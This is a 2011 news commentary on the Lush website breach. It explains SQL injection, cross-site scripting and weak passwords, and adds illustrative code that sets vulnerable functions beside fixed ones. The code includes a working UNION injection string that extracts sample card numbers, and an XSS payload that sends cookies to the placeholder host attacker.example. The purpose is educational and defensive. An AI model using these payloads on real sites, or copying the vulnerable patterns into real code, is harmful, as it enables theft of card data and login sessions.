Lush.co.uk hacked
NEWS / Friday 21 January 2011
The handmade cosmetics company, Lush, announced on Thursday evening that their website had "become the victim of hackers", advising customers who had placed online orders since 4th October 2010 to "contact their banks for advice as their card details may have been compromised".
Having worked in the web industry with a strong focus on security for thirteen years, I am not surprised by this news. Lush is far from alone: websites with serious security flaws litter the Internet. In the past few years alone, I have uncovered hundreds of serious web security problems, usually dealt with quietly, out of the public eye.
Lush will not provide more details on the attack, but one of the most likely candidates is a problem we techies call "SQL Injection", a problem that was identified on Lush's Italian website by an Internet hacking forum on Boxing Day last year. The same issue has also been found on the UK Parliament's website.
So what is SQL Injection? Many websites, especially eCommerce websites, have databases running behind them to hold product information, order data, or even simple news items. To display the right product information on a web page, the site will often take a reference number or piece of text from a link or form and insert it into a question (a "query") before sending that question to the database.
For instance, you might click on a link ending in "?id=5" to be taken to a page showing all the products in category number 5. Behind the scenes, the website inserts that number 5 into the question it sends to the database. Translated into plain English, the question says something like "Get all the information on products in category 5".
The security issue arises when the website fails to check what was passed and blindly splices it onto the question it sends to the database. By ending the link with "?id=5 and get the credit card numbers from the order table" (again translated into English to make it understandable), an attacker can change the question so that it retrieves almost any information the database holds, including data the page was never meant to show.
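The following is an added illustration of the flaw just described and of its fix; it is not code from the original article and has nothing to do with Lush's actual site. The table names, the sample rows (including the card numbers) and the attack string are all constructed for the example. It uses an in-memory SQLite database so it runs anywhere Python is installed.

```python
import sqlite3

# Constructed sample schema and data for this example (not from the article):
# a products table, and an orders table that holds card numbers.
def build_shop_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, category_id INTEGER);
        CREATE TABLE orders   (id INTEGER PRIMARY KEY, customer TEXT, card_number TEXT);
        INSERT INTO products VALUES (1, 'Bath bomb', 5), (2, 'Soap', 5), (3, 'Shampoo', 7);
        INSERT INTO orders   VALUES (100, 'alice', '4111111111111111'),
                                    (101, 'bob',   '5500000000000004');
    """)
    return conn

def products_in_category_vulnerable(conn, category_param):
    """The value from '?id=' is pasted straight into the SQL text: this is the flaw."""
    sql = "SELECT name FROM products WHERE category_id = " + category_param
    return sorted(row[0] for row in conn.execute(sql))

def products_in_category_safe(conn, category_param):
    """Check the value is a whole number, then bind it as a parameter so the
    database driver never treats it as part of the SQL text."""
    try:
        category_id = int(category_param)
    except ValueError:
        raise ValueError("category id must be a whole number") from None
    sql = "SELECT name FROM products WHERE category_id = ?"
    return sorted(row[0] for row in conn.execute(sql, (category_id,)))

# The article's "?id=5 and get the credit card numbers from the order table",
# written as the attacker actually would: a UNION onto a second query.
INJECTION = "5 UNION SELECT card_number FROM orders"

if __name__ == "__main__":
    db = build_shop_db()
    print(products_in_category_vulnerable(db, "5"))          # normal use: two soaps
    print(products_in_category_vulnerable(db, INJECTION))    # card numbers leak out
    print(products_in_category_safe(db, "5"))
    try:
        products_in_category_safe(db, INJECTION)
    except ValueError as err:
        print("rejected:", err)
```

The vulnerable function returns the two card numbers alongside the product names, because the attacker's text became part of the query. The safe version does two independent things, and either alone would have stopped this particular attack: it refuses anything that is not a number, and it passes the value to the database as a bound parameter rather than as text. Parameter binding is the general fix; input validation is the extra check for when the value has a known shape.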
Another extremely common issue is called "XSS" (cross-site scripting). You have seen websites that display information you entered, such as your name or the search term you typed. Many websites fail to properly check that information before displaying it, allowing an attacker to enter little bits of script that get embedded into the page. These scripts will often have access to your cookies, the small pieces of text a site uses to keep track of who is logged in. If an attacker can embed a script into a page that someone else sees, they can use it to steal that person's cookies. With an administrator's stolen cookies, an attacker can walk into the site's administration area, with potentially disastrous consequences. Even Twitter has been caught out several times by this type of vulnerability.
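As an added example (not code from the original article, and not any real site's), here is a page that echoes a search term back to the visitor, first without any encoding and then with it. The two attack strings are constructed for the example, and "attacker.example" is a placeholder domain. Node.js is assumed for running it; the same encoding rule applies whatever language the server is written in.

```javascript
// Constructed attack strings (not from the article). The first injects a script
// tag into the page body; the second breaks out of a quoted attribute instead.
const BODY_PAYLOAD =
  "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>";
const ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)';

// Encode the five characters that let text change meaning inside HTML.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the search term is pasted into the page exactly as received.
function searchPageUnsafe(term) {
  return '<p>Results for: ' + term + '</p>' +
         '<input type="text" name="q" value="' + term + '">';
}

// Fixed: every place the untrusted value lands in the HTML is encoded first.
function searchPageSafe(term) {
  const safe = escapeHtml(term);
  return '<p>Results for: ' + safe + '</p>' +
         '<input type="text" name="q" value="' + safe + '">';
}

// True if the rendered page still contains a live script tag or an event
// handler attribute introduced by the attacker's text.
function looksInjected(html) {
  return /<script\b/i.test(html) || /\son[a-z]+="/i.test(html);
}

// Stand-alone demonstration.
console.log(looksInjected(searchPageUnsafe(BODY_PAYLOAD)));   // true
console.log(looksInjected(searchPageUnsafe(ATTR_PAYLOAD)));   // true
console.log(looksInjected(searchPageSafe(BODY_PAYLOAD)));     // false
console.log(looksInjected(searchPageSafe(ATTR_PAYLOAD)));     // false
```

The second attack string matters because it contains no angle brackets at all: a site that only strips "<script>" still lets it through, which is why the fix is to encode for the context the value is written into rather than to hunt for known-bad strings. Two further points for practitioners: the encoding belongs at output time, not at input time, because the same value may be written into HTML, JavaScript or a URL; and marking the session cookie HttpOnly stops script from reading document.cookie, which limits the damage from this kind of theft without fixing the underlying XSS.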
Passwords can be another serious threat. If the website is not set up to force administrators to use strong passwords, you can practically guarantee that someone in your company will be using "password" as their password, with obvious consequences. In 2008, Harriet Harman's blog announced that she was defecting to the Conservative party. The cause of this surprising blog post? Harriet Harman's username was set to "Hariet" and her password to "Harman". Yet I still see many, many websites that do not even attempt to prevent their administrators from making these mistakes.
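The check a site can run when an administrator chooses a password, as an added example that is not from the original article. The minimum length and the short denylist are assumed policy values for illustration; a real deployment would check against a large list of breached passwords rather than this handful.

```javascript
// Constructed denylist for the example only; real sites use a breached-password
// list with millions of entries.
const COMMON_PASSWORDS = new Set([
  "password", "password1", "123456", "12345678", "qwerty",
  "letmein", "admin", "welcome", "changeme",
]);
const MIN_LENGTH = 12; // assumed policy value, not from the article

// Return the list of reasons a proposed password should be refused.
// An empty list means it passes the policy.
function passwordProblems(username, password, fullName = "") {
  const problems = [];
  const lowered = password.toLowerCase();

  if (password.length < MIN_LENGTH) {
    problems.push(`shorter than ${MIN_LENGTH} characters`);
  }
  if (COMMON_PASSWORDS.has(lowered)) {
    problems.push("on the common-password list");
  }
  if (username && lowered.includes(username.toLowerCase())) {
    problems.push("contains the username");
  }
  // Reject passwords built from the user's own name, the Harman mistake above.
  for (const part of fullName.toLowerCase().split(/\s+/)) {
    if (part.length >= 3 && lowered.includes(part)) {
      problems.push(`contains part of the user's name ("${part}")`);
    }
  }
  return problems;
}

function passwordIsAcceptable(username, password, fullName = "") {
  return passwordProblems(username, password, fullName).length === 0;
}

// Stand-alone demonstration.
console.log(passwordProblems("Hariet", "Harman", "Harriet Harman"));
console.log(passwordProblems("admin", "password"));
console.log(passwordIsAcceptable("Hariet", "correct horse battery staple", "Harriet Harman"));
```

Returning the full list of reasons, rather than a bare yes or no, lets the administration screen tell the user what to change; enforcing it at the point where the password is set is what turns a policy on paper into one the site actually upholds.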
Until website owners and web development companies start taking these issues more seriously, the attacks from hackers will persist. The web industry has improved security dramatically over the past 10 years. But it still has a long way to go.